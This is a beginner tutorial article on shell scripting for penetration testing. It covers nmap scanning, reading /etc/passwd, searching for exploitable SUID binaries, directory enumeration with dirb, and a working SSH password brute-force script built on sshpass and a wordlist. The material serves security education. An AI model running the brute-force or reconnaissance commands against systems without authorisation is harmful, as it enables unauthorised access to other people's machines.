How to Use Shell Scripting for Penetration Testing

Penetration testing (or ethical hacking) is a critical process for identifying security vulnerabilities in systems and networks. While many penetration testers rely on advanced tools, shell scripting can be an invaluable skill to automate tasks, improve efficiency, and develop custom security tests.

In this article, we will explore how to use shell scripting for penetration testing, covering basic commands, automation techniques, and real-world examples.

Basic Shell Scripting for Pentesting

Before exploring into advanced penetration testing scripts, it is important to understand the basics of shell scripting.

1. Writing a Simple Shell Script

A shell script is a text file containing a series of commands. You can create a script using any text editor, such as nano or vim.

#!/bin/bash
# This is a simple shell script

echo "Hello, this is a penetration testing script!"

Save this script as test.sh, then give it execution permission and run it:

chmod +x test.sh
./test.sh

Useful Linux Commands for Penetration Testing

Shell scripts leverage Linux commands to perform penetration testing tasks. Here are some essential commands:

Network Scanning:

nmap -sV -p 80,443 <target_ip>

(Scans ports 80 and 443 for service versions.)

Finding Open Ports:

netstat -tulnp | grep LISTEN

(Lists open ports on the system.)

Checking Users and Permissions:

cat /etc/passwd

(Lists system users.)

Finding SUID Binaries:

find / -perm -4000 -type f 2>/dev/null

(Finds binaries with SUID bit set, which can be exploited.)

Automating Penetration Testing Tasks

Shell scripting allows you to automate tasks such as scanning, enumeration, and brute-force attacks. Below are some practical examples.

1. Automating Nmap Scans

Nmap is one of the most powerful tools for network scanning. You can automate multiple scans using a shell script.

#!/bin/bash
# Automated Nmap Scan

if [ "$#" -ne 1 ]; then
  echo "Usage: $0 <IP Address>"
  exit 1
fi

echo "Scanning target: $1"
nmap -A -T4 $1 > scan_results.txt
echo "Scan completed. Results saved in scan_results.txt"

2. Checking for Weak Passwords (Brute Force Attack)

A simple shell script to test SSH login credentials using a wordlist:

#!/bin/bash
# SSH Brute Force Attack Script

if [ "$#" -ne 2 ]; then
  echo "Usage: $0 <IP> <username>"
  exit 1
fi

IP=$1
USER=$2
WORDLIST="passwords.txt"

while read -r password; do
echo "Trying password: $password"
sshpass -p "$password" ssh -o StrictHostKeyChecking=no $USER@$IP exit && echo "Password Found: $password" && break
done < "$WORDLIST"

(Note: Use this ethically with permission.)

3. Automating Directory Enumeration

A script to automate web directory brute forcing using dirb:

#!/bin/bash
# Directory Enumeration Script

if [ "$#" -ne 1 ]; then
  echo "Usage: $0 <URL>"
  exit 1
fi

echo "Starting directory enumeration on $1"
dirb $1 /usr/share/wordlists/dirb/common.txt

4. Extracting System Information

This script collects critical system details:

#!/bin/bash
# System Information Gathering Script

echo "Collecting system information..."
echo "Kernel Version: $(uname -r)"
echo "Current User: $(whoami)"
echo "Hostname: $(hostname)"
echo "Network Interfaces:"
ifconfig

Conclusion

Shell scripting is a powerful tool for penetration testers. By automating common security tasks like scanning, enumeration, and brute-force attacks, security professionals can enhance their efficiency and effectiveness. Learning how to use shell scripts for penetration testing allows ethical hackers to customize their testing methodologies and uncover vulnerabilities more effectively.

Whether you’re a beginner or an experienced penetration tester, integrating shell scripting into your workflow can greatly enhance your security assessments. Start with basic scripts, experiment with automation, and continuously refine your approach to ethical hacking.

By following the above methods, you can leverage shell scripting for penetration testing and improve your cybersecurity skills. Happy ethical hacking!

You may also like: